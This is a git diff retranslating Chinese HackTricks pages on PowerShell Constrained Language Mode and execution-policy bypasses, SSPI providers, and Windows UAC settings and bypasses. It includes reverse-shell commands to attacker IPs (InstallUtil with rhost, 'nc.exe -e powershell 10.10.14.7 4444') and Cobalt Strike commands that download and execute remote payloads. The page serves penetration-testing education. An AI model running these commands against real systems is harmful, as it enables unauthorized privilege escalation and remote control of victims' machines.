+## PS受限语言模式
-PowerShell [**受限语言模式**](https://devblogs.microsoft.com/powershell/powershell-constrained-language-mode/) **限制了许多**有效使用PowerShell所需的功能,如阻止COM对象,仅允许批准的.NET类型,基于XAML的工作流程,PowerShell类等。
+PowerShell [**受限语言模式**](https://devblogs.microsoft.com/powershell/powershell-constrained-language-mode/) **锁定了许多有效使用PowerShell所需的功能**,例如阻止COM对象,仅允许批准的.NET类型、基于XAML的工作流、PowerShell类等。
### **检查**
```powershell
@@ -198,10 +200,10 @@ $ExecutionContext.SessionState.LanguageMode
#Easy bypass
Powershell -version 2
```
-在当前的Windows中,绕过不起作用,但你可以使用[**PSByPassCLM**](https://github.com/padovah4ck/PSByPassCLM)。\
-**要编译它,您可能需要** **添加引用** -> _浏览_ ->_浏览_ -> 添加 `C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0\31bf3856ad364e35\System.Management.Automation.dll` 并**将项目更改为 .Net4.5**。
+在当前的Windows中,绕过方法将不起作用,但您可以使用[ **PSByPassCLM**](https://github.com/padovah4ck/PSByPassCLM)。\
+**要编译它,您可能需要** **_添加引用_** -> _浏览_ -> _浏览_ -> 添加 `C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0\31bf3856ad364e35\System.Management.Automation.dll` 并**将项目更改为 .Net4.5**。
-#### 直接绕过:
+#### 直接绕过:
```bash
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /U c:\temp\psby.exe
```
@@ -209,11 +211,11 @@ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogTo
```bash
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /rhost=10.10.13.206 /rport=443 /U c:\temp\psby.exe
```
-您可以使用[**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick)或[**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick)来在任何进程中执行Powershell代码并绕过受限模式。有关更多信息,请查看:[https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode)。
+您可以使用 [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) 或 [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) 来 **执行 Powershell** 代码在任何进程中并绕过受限模式。有关更多信息,请查看: [https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode)。
-## PS执行策略
+## PS 执行策略
-默认情况下设置为**restricted**。绕过此策略的主要方法:
+默认情况下,它设置为 **restricted.** 绕过此策略的主要方法:
```powershell
1º Just copy and paste inside the interactive PS console
2º Read en Exec
@@ -233,32 +235,32 @@ Powershell -command "Write-Host 'My voice is my passport, verify me.'"
9º Use EncodeCommand
$command = "Write-Host 'My voice is my passport, verify me.'" $bytes = [System.Text.Encoding]::Unicode.GetBytes($command) $encodedCommand = [Convert]::ToBase64String($bytes) powershell.exe -EncodedCommand $encodedCommand
```
-更多内容请查看[这里](https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/)
+更多内容可以在 [这里](https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/) 找到。
-## 安全支持提供程序接口(SSPI)
+## 安全支持提供者接口 (SSPI)
-是用于认证用户的 API。
+是用于验证用户的 API。
-SSPI 将负责找到两台想要通信的机器的适当协议。首选方法是 Kerberos。然后 SSPI 将协商将使用哪种认证协议,这些认证协议称为安全支持提供程序(SSP),以 DLL 的形式位于每台 Windows 机器内,并且两台机器必须支持相同的协议才能通信。
+SSPI 将负责为想要通信的两台机器找到合适的协议。首选的方法是 Kerberos。然后,SSPI 将协商使用哪个身份验证协议,这些身份验证协议称为安全支持提供者 (SSP),以 DLL 的形式位于每台 Windows 机器内部,且两台机器必须支持相同的协议才能进行通信。
### 主要 SSP
* **Kerberos**:首选
* %windir%\Windows\System32\kerberos.dll
-* **NTLMv1** 和 **NTLMv2**:兼容性原因
+* **NTLMv1** 和 **NTLMv2**:出于兼容性原因
* %windir%\Windows\System32\msv1\_0.dll
-* **Digest**:Web 服务器和 LDAP,密码以 MD5 哈希的形式
+* **Digest**:Web 服务器和 LDAP,密码以 MD5 哈希形式存在
* %windir%\Windows\System32\Wdigest.dll
* **Schannel**:SSL 和 TLS
* %windir%\Windows\System32\Schannel.dll
-* **Negotiate**:用于协商要使用的协议(Kerberos 或 NTLM,Kerberos 是默认的)
+* **Negotiate**:用于协商使用的协议(Kerberos 或 NTLM,默认是 Kerberos)
* %windir%\Windows\System32\lsasrv.dll
-#### 协商可以提供多种方法或仅一种方法。
+#### 协商可以提供多种方法或仅提供一种。
-## UAC - 用户账户控制
+## UAC - 用户帐户控制
-[用户账户控制(UAC)](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) 是一项功能,可为**提升的活动**启用**同意提示**。
+[用户帐户控制 (UAC)](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) 是一个启用 **提升活动的同意提示** 的功能。
{% content-ref url="uac-user-account-control.md" %}
[uac-user-account-control.md](uac-user-account-control.md)
@@ -267,23 +269,24 @@ SSPI 将负责找到两台想要通信的机器的适当协议。首选方法是
\
-使用 [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) 可轻松构建和**自动化工作流程**,由全球**最先进**的社区工具提供支持。\
+使用 [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) 轻松构建和 **自动化工作流**,由世界上 **最先进** 的社区工具提供支持。\
立即获取访问权限:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
***
+{% hint style="success" %}
+学习和实践 AWS 黑客攻击:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+学习和实践 GCP 黑客攻击:[**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
-从零开始学习 AWS 黑客技术,成为专家 htARTE(HackTricks AWS 红队专家)!
+支持 HackTricks
-支持 HackTricks 的其他方式:
-
-* 如果您想在 HackTricks 中看到您的**公司广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
-* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
-* 发现[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFT**](https://opensea.io/collection/the-peass-family)收藏品
-* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们**。
-* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
+* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
+* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
+{% endhint %}
diff --git a/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control.md b/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control.md
index 765868fac..3597e4e11 100644
--- a/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control.md
+++ b/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control.md
@@ -1,29 +1,30 @@
-# UAC - 用户账户控制
+# UAC - 用户帐户控制
+
+{% hint style="success" %}
+学习和实践 AWS 黑客技术:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+学习和实践 GCP 黑客技术:[**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS Red Team Expert)!
+支持 HackTricks
-支持HackTricks的其他方式:
-
-- 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
-- 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
-- 探索[**PEASS Family**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
-- **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
-- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
+* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
+* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
+{% endhint %}
-使用[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)可以轻松构建和**自动化工作流程**,使用世界上**最先进**的社区工具。\
-立即获取访问权限:
+使用 [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) 轻松构建和 **自动化工作流**,由世界上 **最先进** 的社区工具提供支持。\
+今天就获取访问权限:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
## UAC
-[用户账户控制(UAC)](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works)是一项功能,它为**提升的活动启用了一个同意提示**。应用程序具有不同的`完整性`级别,具有**高级别**的程序可以执行**可能危及系统的任务**。当启用UAC时,应用程序和任务始终以非管理员帐户的安全上下文下运行,除非管理员明确授权这些应用程序/任务具有管理员级别访问系统的权限来运行。这是一个方便的功能,可保护管理员免受意外更改,但不被视为安全边界。
+[用户帐户控制 (UAC)](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) 是一个功能,允许 **提升活动的同意提示**。应用程序具有不同的 `integrity` 级别,具有 **高级别** 的程序可以执行 **可能危害系统** 的任务。当 UAC 启用时,应用程序和任务始终 **在非管理员帐户的安全上下文中运行**,除非管理员明确授权这些应用程序/任务以管理员级别访问系统进行运行。这是一个便利功能,可以保护管理员免受意外更改,但不被视为安全边界。
有关完整性级别的更多信息:
@@ -31,104 +32,105 @@
[integrity-levels.md](../windows-local-privilege-escalation/integrity-levels.md)
{% endcontent-ref %}
-当UAC生效时,管理员用户会获得2个令牌:一个标准用户密钥,用于作为普通级别执行常规操作,另一个带有管理员权限。
+当 UAC 生效时,管理员用户会获得 2 个令牌:一个标准用户密钥,用于以常规级别执行常规操作,以及一个具有管理员权限的密钥。
-这个[页面](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works)深入讨论了UAC的工作原理,包括登录过程、用户体验和UAC架构。管理员可以使用安全策略来配置UAC在本地级别上的工作方式(使用secpol.msc),或通过Active Directory域环境中的组策略对象(GPO)进行配置和推送。各种设置在[这里](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-security-policy-settings)有详细讨论。有10个组策略设置可用于UAC。以下表格提供了额外的细节:
+此 [页面](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) 深入讨论了 UAC 的工作原理,包括登录过程、用户体验和 UAC 架构。管理员可以使用安全策略配置 UAC 在本地级别如何特定于其组织的工作(使用 secpol.msc),或通过组策略对象 (GPO) 在 Active Directory 域环境中配置并推送。各种设置在 [这里](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-security-policy-settings) 详细讨论。可以为 UAC 设置 10 个组策略设置。以下表格提供了更多详细信息:
-| 组策略设置 | 注册表键 | 默认设置 |
+| 组策略设置 | 注册表项 | 默认设置 |
| ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | --------------------------- | ------------------------------------------------------------ |
-| [用户账户控制:内置管理员帐户的管理员批准模式](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-admin-approval-mode-for-the-built-in-administrator-account) | FilterAdministratorToken | Disabled |
-| [用户账户控制:允许UIAccess应用程序在不使用安全桌面的情况下提示提升](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-allow-uiaccess-applications-to-prompt-for-elevation-without-using-the-secure-desktop) | EnableUIADesktopToggle | Disabled |
-| [用户账户控制:管理员批准模式下管理员的提升提示行为](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-behavior-of-the-elevation-prompt-for-administrators-in-admin-approval-mode) | ConsentPromptBehaviorAdmin | Prompt for consent for non-Windows binaries |
-| [用户账户控制:标准用户的提升提示行为](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-behavior-of-the-elevation-prompt-for-standard-users) | ConsentPromptBehaviorUser | Prompt for credentials on the secure desktop |
-| [用户账户控制:检测应用程序安装并提示提升](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-detect-application-installations-and-prompt-for-elevation) | EnableInstallerDetection | Enabled (default for home) Disabled (default for enterprise) |
-| [用户账户控制:仅提升已签名和验证的可执行文件](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-only-elevate-executables-that-are-signed-and-validated) | ValidateAdminCodeSignatures | Disabled |
-| [用户账户控制:仅提升已安装在安全位置的UIAccess应用程序](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-only-elevate-uiaccess-applications-that-are-installed-in-secure-locations) | EnableSecureUIAPaths | Enabled |
-| [用户账户控制:以管理员批准模式运行所有管理员](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-run-all-administrators-in-admin-approval-mode) | EnableLUA | Enabled |
-| [用户账户控制:在提示提升时切换到安全桌面](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-switch-to-the-secure-desktop-when-prompting-for-elevation) | PromptOnSecureDesktop | Enabled |
-| [用户账户控制:将文件和注册表写入失败虚拟化到每个用户位置](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-virtualize-file-and-registry-write-failures-to-per-user-locations) | EnableVirtualization | Enabled |
-### UAC Bypass Theory
+| [用户帐户控制:内置管理员帐户的管理员批准模式](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-admin-approval-mode-for-the-built-in-administrator-account) | FilterAdministratorToken | 禁用 |
+| [用户帐户控制:允许 UIAccess 应用程序在不使用安全桌面的情况下提示提升](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-allow-uiaccess-applications-to-prompt-for-elevation-without-using-the-secure-desktop) | EnableUIADesktopToggle | 禁用 |
+| [用户帐户控制:管理员在管理员批准模式下的提升提示行为](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-behavior-of-the-elevation-prompt-for-administrators-in-admin-approval-mode) | ConsentPromptBehaviorAdmin | 对非 Windows 二进制文件提示同意 |
+| [用户帐户控制:标准用户的提升提示行为](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-behavior-of-the-elevation-prompt-for-standard-users) | ConsentPromptBehaviorUser | 在安全桌面上提示凭据 |
+| [用户帐户控制:检测应用程序安装并提示提升](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-detect-application-installations-and-prompt-for-elevation) | EnableInstallerDetection | 启用(家庭版默认)禁用(企业版默认) |
+| [用户帐户控制:仅提升已签名和验证的可执行文件](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-only-elevate-executables-that-are-signed-and-validated) | ValidateAdminCodeSignatures | 禁用 |
+| [用户帐户控制:仅提升安装在安全位置的 UIAccess 应用程序](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-only-elevate-uiaccess-applications-that-are-installed-in-secure-locations) | EnableSecureUIAPaths | 启用 |
+| [用户帐户控制:所有管理员都在管理员批准模式下运行](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-run-all-administrators-in-admin-approval-mode) | EnableLUA | 启用 |
+| [用户帐户控制:在提示提升时切换到安全桌面](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-switch-to-the-secure-desktop-when-prompting-for-elevation) | PromptOnSecureDesktop | 启用 |
+| [用户帐户控制:将文件和注册表写入失败虚拟化到每用户位置](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-virtualize-file-and-registry-write-failures-to-per-user-locations) | EnableVirtualization | 启用 |
-一些程序如果用户属于管理员组,则会自动**自动提升**权限。这些可执行文件在其 _**清单**_ 中具有 _**autoElevate**_ 选项,其值为 _**True**_。此二进制文件还必须由 Microsoft **签名**。
+### UAC 绕过理论
-因此,为了**绕过** **UAC**(从**中等**完整性级别提升到高级),一些攻击者使用这种类型的二进制文件来**执行任意代码**,因为它将从**高级**完整性进程中执行。
+如果 **用户属于** **管理员组**,某些程序会 **自动提升**。这些二进制文件在其 _**清单**_ 中具有 _**autoElevate**_ 选项,值为 _**True**_。该二进制文件还必须 **由 Microsoft 签名**。
-您可以使用 Sysinternals 的 _sigcheck.exe_ 工具**检查**二进制文件的 _**清单**_。您还可以使用 _Process Explorer_ 或 _Process Monitor_(Sysinternals 的工具)**查看**进程的**完整性级别**。
+然后,为了 **绕过** **UAC**(从 **中等** 完整性级别 **提升到高**),一些攻击者使用这种二进制文件来 **执行任意代码**,因为它将从 **高完整性级别进程** 中执行。
-### Check UAC
+您可以使用 Sysinternals 的工具 _**sigcheck.exe**_ 检查二进制文件的 _**清单**_。您可以使用 _Process Explorer_ 或 _Process Monitor_(来自 Sysinternals)查看进程的 **完整性级别**。
-要确认 UAC 是否已启用,请执行以下操作:
+### 检查 UAC
+
+要确认 UAC 是否启用,请执行:
```
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
EnableLUA REG_DWORD 0x1
```
-如果是**`1`**,则UAC已**激活**;如果是**`0`**或**不存在**,则UAC为**未激活**。
+如果是 **`1`**,则 UAC **已激活**;如果是 **`0`** 或者 **不存在**,则 UAC **未激活**。
-然后,检查已配置的**哪个级别**:
+然后,检查 **配置的级别**:
```
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
ConsentPromptBehaviorAdmin REG_DWORD 0x5
```
-* 如果是 **`0`**,那么 UAC 不会提示(类似于 **禁用**)
-* 如果是 **`1`**,管理员会被要求输入用户名和密码以使用高权限执行二进制文件(在安全桌面上)
-* 如果是 **`2`**(**始终通知我**),当管理员尝试以高权限执行某些内容时,UAC 将始终要求管理员确认(在安全桌面上)
-* 如果是 **`3`**,类似于 `1` 但不一定在安全桌面上
-* 如果是 **`4`**,类似于 `2` 但不一定在安全桌面上
-* 如果是 **`5`**(**默认**),它将要求管理员确认以以高权限运行非 Windows 二进制文件
+* 如果 **`0`**,则 UAC 不会提示(如 **禁用**)
+* 如果 **`1`**,则管理员会被 **要求输入用户名和密码** 以高权限执行二进制文件(在安全桌面上)
+* 如果 **`2`**(**始终通知我**),当管理员尝试以高权限执行某些操作时,UAC 将始终要求确认(在安全桌面上)
+* 如果 **`3`**,类似于 `1`,但不一定在安全桌面上
+* 如果 **`4`**,类似于 `2`,但不一定在安全桌面上
+* 如果 **`5`**(**默认**),它会要求管理员确认以高权限运行非 Windows 二进制文件
然后,您需要查看 **`LocalAccountTokenFilterPolicy`** 的值\
-如果值为 **`0`**,那么只有 **RID 500** 用户(内置管理员)能够在没有 UAC 的情况下执行 **管理员任务**,如果是 `1`,**"Administrators"** 组内的所有帐户都可以执行这些任务。
+如果值为 **`0`**,则只有 **RID 500** 用户(**内置管理员**)能够在没有 UAC 的情况下执行 **管理员任务**,如果为 `1`,则 **“Administrators”** 组中的所有帐户都可以执行这些任务。
-最后,查看 **`FilterAdministratorToken`** 键的值\
-如果是 **`0`**(默认),**内置管理员帐户** 可以进行远程管理任务,如果是 **`1`**,内置管理员帐户 **不能** 进行远程管理任务,除非 `LocalAccountTokenFilterPolicy` 设置为 `1`。
+最后查看 **`FilterAdministratorToken`** 的键值\
+如果 **`0`**(默认),则 **内置管理员帐户可以** 执行远程管理任务;如果 **`1`**,则内置管理员帐户 **无法** 执行远程管理任务,除非 `LocalAccountTokenFilterPolicy` 设置为 `1`。
#### 总结
-* 如果 `EnableLUA=0` 或 **不存在**,**任何人都没有 UAC**
-* 如果 `EnableLua=1` 和 **`LocalAccountTokenFilterPolicy=1`,任何人都没有 UAC**
-* 如果 `EnableLua=1` 和 **`LocalAccountTokenFilterPolicy=0` 和 `FilterAdministratorToken=0`,RID 500(内置管理员)没有 UAC**
-* 如果 `EnableLua=1` 和 **`LocalAccountTokenFilterPolicy=0` 和 `FilterAdministratorToken=1`,所有人都有 UAC**
+* 如果 `EnableLUA=0` 或 **不存在**,**没有 UAC 对任何人**
+* 如果 `EnableLua=1` 且 **`LocalAccountTokenFilterPolicy=1`,没有 UAC 对任何人**
+* 如果 `EnableLua=1` 且 **`LocalAccountTokenFilterPolicy=0` 且 `FilterAdministratorToken=0`,没有 UAC 对 RID 500(内置管理员)**
+* 如果 `EnableLua=1` 且 **`LocalAccountTokenFilterPolicy=0` 且 `FilterAdministratorToken=1`,UAC 对所有人**
-所有这些信息可以使用 **metasploit** 模块收集:`post/windows/gather/win_privs`
+所有这些信息可以通过 **metasploit** 模块收集:`post/windows/gather/win_privs`
您还可以检查用户的组并获取完整性级别:
```
net user %username%
whoami /groups | findstr Level
```
-## UAC绕过
+## UAC 绕过
{% hint style="info" %}
-请注意,如果您可以访问受害者的图形界面,UAC绕过就很简单,因为您可以在UAC提示出现时简单地点击“是”
+请注意,如果您可以图形访问受害者,UAC 绕过是直接的,因为您可以在 UAC 提示出现时简单地点击“是”
{% endhint %}
-在以下情况下需要UAC绕过:**UAC已激活,您的进程在中间完整性上下文中运行,且您的用户属于管理员组**。
+在以下情况下需要 UAC 绕过:**UAC 已激活,您的进程在中等完整性上下文中运行,并且您的用户属于管理员组**。
-值得一提的是,**如果UAC处于最高安全级别(始终)中,要绕过UAC要困难得多,而如果它处于任何其他级别(默认)中,则要容易得多**。
+重要的是要提到,如果 UAC 处于最高安全级别(始终),则**绕过 UAC 要比在其他任何级别(默认)下要困难得多**。
-### UAC已禁用
+### UAC 禁用
-如果UAC已被禁用(`ConsentPromptBehaviorAdmin`是**`0`**),您可以使用类似以下内容**以管理员权限(高完整性级别)执行反向Shell**:
+如果 UAC 已经禁用(`ConsentPromptBehaviorAdmin` 为 **`0`**),您可以使用类似的方式**以管理员权限执行反向 shell**(高完整性级别):
```bash
#Put your reverse shell instead of "calc.exe"
Start-Process powershell -Verb runAs "calc.exe"
Start-Process powershell -Verb runAs "C:\Windows\Temp\nc.exe -e powershell 10.10.14.7 4444"
```
-#### 使用令牌复制绕过UAC
+#### UAC 绕过与令牌复制
* [https://ijustwannared.team/2017/11/05/uac-bypass-with-token-duplication/](https://ijustwannared.team/2017/11/05/uac-bypass-with-token-duplication/)
* [https://www.tiraniddo.dev/2018/10/farewell-to-token-stealing-uac-bypass.html](https://www.tiraniddo.dev/2018/10/farewell-to-token-stealing-uac-bypass.html)
-### **非常**基本的UAC“绕过”(完全文件系统访问)
+### **非常** 基本的 UAC "绕过"(完全文件系统访问)
-如果您拥有一个属于管理员组的用户的shell,您可以通过SMB(文件系统)本地共享**挂载C$**,然后在新磁盘中访问**文件系统中的所有内容**(甚至是管理员的主文件夹)。
+如果你有一个属于管理员组的用户的 shell,你可以 **通过 SMB(文件系统)将 C$ 共享挂载** 到一个新的磁盘上,这样你将 **访问到文件系统中的所有内容**(甚至是管理员的主文件夹)。
{% hint style="warning" %}
-**看起来这个技巧不再起作用了**
+**看起来这个技巧不再有效**
{% endhint %}
```bash
net use Z: \\127.0.0.1\c$
@@ -137,9 +139,9 @@ cd C$
#Or you could just access it:
dir \\127.0.0.1\c$\Users\Administrator\Desktop
```
-### 使用 Cobalt Strike 绕过 UAC
+### UAC绕过与Cobalt Strike
-只有在 UAC 没有设置为最高安全级别时,Cobalt Strike 技术才能生效。
+Cobalt Strike技术仅在UAC未设置为最高安全级别时有效
```bash
# UAC bypass via token duplication
elevate uac-token-duplication [listener_name]
@@ -151,18 +153,18 @@ runasadmin uac-token-duplication powershell.exe -nop -w hidden -c "IEX ((new-obj
# Bypass UAC with CMSTPLUA COM interface
runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
```
-**Empire**和**Metasploit**也有几个模块可以**绕过**用户账户控制(**UAC**)。
+**Empire** 和 **Metasploit** 也有几个模块可以 **绕过** **UAC**。
### KRBUACBypass
-文档和工具在[https://github.com/wh0amitz/KRBUACBypass](https://github.com/wh0amitz/KRBUACBypass)
+文档和工具在 [https://github.com/wh0amitz/KRBUACBypass](https://github.com/wh0amitz/KRBUACBypass)
-### UAC绕过利用
+### UAC 绕过漏洞
-[**UACME**](https://github.com/hfiref0x/UACME)是几个UAC绕过利用的**编译**集合。请注意,您需要使用Visual Studio或MSBuild来**编译UACME**。编译将创建几个可执行文件(如`Source\Akagi\outout\x64\Debug\Akagi.exe`),您需要知道**您需要哪一个**。\
-您应该**小心**,因为有些绕过会**提示其他程序**,这些程序会**警告用户**有事情发生。
+[**UACME** ](https://github.com/hfiref0x/UACME) 是几个 UAC 绕过漏洞的 **汇编**。请注意,您需要 **使用 Visual Studio 或 msbuild 编译 UACME**。编译将创建几个可执行文件(如 `Source\Akagi\outout\x64\Debug\Akagi.exe`),您需要知道 **您需要哪个**。\
+您应该 **小心**,因为某些绕过会 **提示其他程序**,这会 **警告** **用户** 有事情发生。
-UACME有每个技术开始工作的**构建版本**。您可以搜索影响您版本的技术:
+UACME 有 **每个技术开始工作的构建版本**。您可以搜索影响您版本的技术:
```
PS C:\> [environment]::OSVersion.Version
@@ -170,44 +172,61 @@ Major Minor Build Revision
----- ----- ----- --------
10 0 14393 0
```
-### 更多UAC绕过
+也可以使用 [这个](https://en.wikipedia.org/wiki/Windows\_10\_version\_history) 页面从构建版本中获取 Windows 版本 `1607`。
-这个[页面](https://en.wikipedia.org/wiki/Windows\_10\_version\_history)可以获取Windows版本`1607`的构建版本。
+#### 更多 UAC 绕过
-**所有**在这里用于绕过AUC的技术**都需要**与受害者建立一个**完整的交互式shell**(一个常见的nc.exe shell是不够的)。
+**所有**在这里使用的绕过 AUC 的技术 **都需要**与受害者的 **完整交互式 shell**(普通的 nc.exe shell 不够)。
-你可以使用一个**meterpreter**会话。迁移到一个**Session**值等于**1**的**进程**:
+您可以使用 **meterpreter** 会话获取。迁移到 **Session** 值等于 **1** 的 **进程**:
.png>)
-(_explorer.exe_应该有效)
+(_explorer.exe_ 应该可以工作)
-### 使用GUI的UAC绕过
+### 带 GUI 的 UAC 绕过
-如果你可以访问一个**GUI,当你收到UAC提示时,你可以直接接受**,你不需要绕过它。因此,访问GUI将允许你绕过UAC。
+如果您可以访问 **GUI,您只需在出现 UAC 提示时接受它**,您实际上不需要绕过它。因此,获取对 GUI 的访问将允许您绕过 UAC。
